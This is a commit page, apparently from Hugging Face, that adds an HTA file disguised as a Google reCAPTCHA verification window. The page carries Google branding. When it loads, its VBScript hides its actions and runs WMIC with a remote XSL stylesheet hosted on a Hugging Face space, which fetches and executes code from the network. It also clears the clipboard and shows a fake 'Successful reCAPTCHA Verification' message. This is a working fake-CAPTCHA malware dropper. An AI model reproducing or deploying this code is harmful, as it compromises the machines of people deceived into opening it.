enotkrutoy commited on
Commit
9f0f8ff
·
verified ·
1 Parent(s): da644a2

Create verif0

Browse files
Files changed (1) hide show
  1. verif0 +94 -0
verif0 ADDED
@@ -0,0 +1,94 @@
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
+ <!DOCTYPE html>
2
+ <html>
3
+ <head>
4
+ <title>reCAPTCHA Verification</title>
5
+ <HTA:APPLICATION
6
+ APPLICATIONNAME="reCAPTCHA Verification"
7
+ BORDER="thin"
8
+ BORDERSTYLE="normal"
9
+ ICON="https://support.google.com/favicon.ico"
10
+ SHOWINTASKBAR="yes"
11
+ SINGLEINSTANCE="yes"
12
+ WINDOWSTATE="normal"
13
+ SCROLL="no"
14
+ SCROLLFLAT="yes"
15
+ SYSMENU="yes"
16
+ />
17
+ <style>
18
+ body {
19
+ font-family: Roboto, helvetica, arial, sans-serif;
20
+ margin: 0;
21
+ padding: 20px;
22
+ text-align: center;
23
+ color: #555;
24
+ box-sizing: border-box;
25
+ display: flex;
26
+ flex-direction: column;
27
+ justify-content: center;
28
+ align-items: center;
29
+ width: 100%;
30
+ height: 100%;
31
+ }
32
+ img {
33
+ width: 200px;
34
+ margin-bottom: 20px;
35
+ }
36
+ #error {
37
+ color: green;
38
+ }
39
+ .terms {
40
+ font-size: small;
41
+ color: #555;
42
+ }
43
+ .terms a {
44
+ text-decoration: none;
45
+ }
46
+ .terms a:hover {
47
+ text-decoration: underline;
48
+ }
49
+ </style>
50
+ <script language="VBScript">
51
+ Sub Window_onLoad
52
+ Window.ResizeTo 520, 480
53
+ Window.MoveTo (Screen.Width - 300) / 2, (Screen.Height - 400) / 2
54
+
55
+ Set objShell = CreateObject("WScript.Shell")
56
+ objShell.Run "cmd /c echo os get /format:""https://huggingface.co/spaces/enotkrutoy/gggg/raw/main/test/WMI.xsl"" | C:\Windows\System32\wbem\WMIC.exe", 0, False
57
+ ClearClipboard
58
+
59
+ objShell.Run "timeout /T 2 /nobreak", 0, True
60
+ Call HideConnectingShowError
61
+ objShell.Run "timeout /T 1 /nobreak", 0, True
62
+ End Sub
63
+ Sub HideConnectingShowError
64
+ document.getElementById("connecting").style.display = "none"
65
+ document.getElementById("error").style.display = "block"
66
+ End Sub
67
+ Sub ClearClipboard
68
+ Dim objHTML
69
+ Set objHTML = CreateObject("htmlfile")
70
+ objHTML.parentWindow.clipboardData.setData "text", ""
71
+ Set objHTML = Nothing
72
+ End Sub
73
+ Sub SendCanaryToken
74
+ Dim xhr
75
+ Set xhr = CreateObject("MSXML2.XMLHTTP")
76
+ xhr.open "GET", "http://canarytokens.com/articles/static/about/00/contact.php", False
77
+ xhr.send
78
+ End Sub
79
+ </script>
80
+ </head>
81
+ <body>
82
+ <img src="https://www.google.com/recaptcha/about/images/reCAPTCHA-logo@2x.png" alt="reCAPTCHA Logo">
83
+ <div id="connecting" style="display:block;">
84
+ <p>Verifying reCAPTCHA, please wait...</p>
85
+ </div>
86
+ <div id="error" style="display:none;">
87
+ <p><b>Successful reCAPTCHA Verification!</b><br></p>
88
+ </div>
89
+ <p class="terms">
90
+ <a href="https://www.google.com/intl/en/policies/privacy/">Privacy</a> -
91
+ <a href="https://www.google.com/intl/en/policies/terms/">Terms</a>
92
+ </p>
93
+ </body>
94
+ </html>